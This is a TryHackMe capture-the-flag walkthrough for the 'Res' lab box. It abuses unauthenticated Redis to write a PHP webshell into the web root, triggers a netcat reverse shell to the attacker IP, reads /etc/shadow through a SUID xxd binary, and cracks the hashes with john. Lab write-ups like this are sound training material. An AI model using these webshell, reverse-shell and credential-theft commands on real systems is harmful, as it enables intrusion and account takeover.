Res Walkthrough — TryHackMe
Box Name: Res
IP: 10.10.104.100
Reconnaissance
First of all, scan the IP completely.
nmap -A -p- -Pn -oN nmapFULL 10.10.104.100
- -A: Enable OS detection, version detection, script scanning, and traceroute
- -Pn : Treat all hosts as online — skip host discovery
- -p- : Scan all ports (65,535)
- -oN : Output scan in normal format
Only 2 ports are open: 80 and 6379.
Port 80 serves the default Apache page.
Redis is running on 6379.
Enumeration
I ran dirb and gobuster against the web server but didn't find anything interesting, so the next option is the Redis server running on 6379.
To talk to the Redis server we need the Redis command-line client on our machine.
sudo apt-get install redis-tools
We can connect to a Redis server with or without a password.
Syntax with password (the password goes after -a; -p is the port, which defaults to 6379)
redis-cli -h $ip_address -a $password
Syntax without password
redis-cli -h $ip_address
In our case unauthenticated access is allowed [ no password required ].
redis-cli -h 10.10.104.100
Since Redis itself is fairly restricted, we need a reverse shell to move on. After a bit of googling I found a nice article on that: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce.
It actually targets Nginx [ /usr/share/nginx/html ] but this box runs Apache [ /var/www/html ], so the directory needed to be changed. The idea is to point the Redis dump directory at the web root (CONFIG SET dir), set the dump file name to a .php file (CONFIG SET dbfilename), store a key whose value is PHP code, and SAVE, so Redis writes its database dump, PHP tag included, into the web root.
Now we can check whether it landed by browsing to http://10.10.104.100/trail.php
Now we will make a PHP command-injection shell. Either overwrite the old trail.php or create a new PHP file. I created a new one named rev.php.
Exploitation
"<?php system($_GET['cmd']); ?>"
Let's access http://10.10.104.100/rev.php?cmd=whoami
Now we need a reverse shell; I'm using a nc one-liner for that.
Syntax :
nc -e /bin/bash $attackerIP $attackerPort
Example:
nc -e /bin/bash 10.9.62.7 1337
Start a listener on the attacker machine first (nc -lvnp 1337), then trigger the one-liner through the webshell. The spaces must be URL-encoded or the browser/server will mangle the command:
http://10.10.104.100/rev.php?cmd=nc%20-e%20/bin/bash%2010.9.62.7%201337
Note that not every netcat build supports -e (the OpenBSD variant does not); if it is missing, use a bash /dev/tcp or python reverse shell instead.
Non-interactive shell to interactive shell:
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg [ press Enter twice ]
export TERM=xterm
Privilege Escalation
We can search for programs with SUID permission
find / -perm -u=s -type f 2>/dev/null
The results show the binary xxd with the SUID bit set and owned by root, so we can check it for exploitation. For SUID/sudo privilege escalation GTFOBins is the place to look.
From GTFOBins we find that a SUID xxd lets us read any file as root, so we read /etc/shadow.
LFILE=/etc/shadow
xxd "$LFILE" | xxd -r
Copy and save the content to our machine [ shadow.txt ].
We need /etc/passwd as well [ passwd.txt ] so that unshadow can combine the two files for john.
unshadow passwd.txt shadow.txt > unshadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt
john --show unshadow.txt
Now we can switch to the user vianka with the su command.
www-data@ubuntu:/$ su - vianka
vianka@ubuntu:~$ sudo -l
vianka@ubuntu:~$ sudo -i
root@ubuntu:~#
Running 'sudo -l' shows that vianka has full sudo access, so to escalate to root all we need to do is run 'sudo -i'.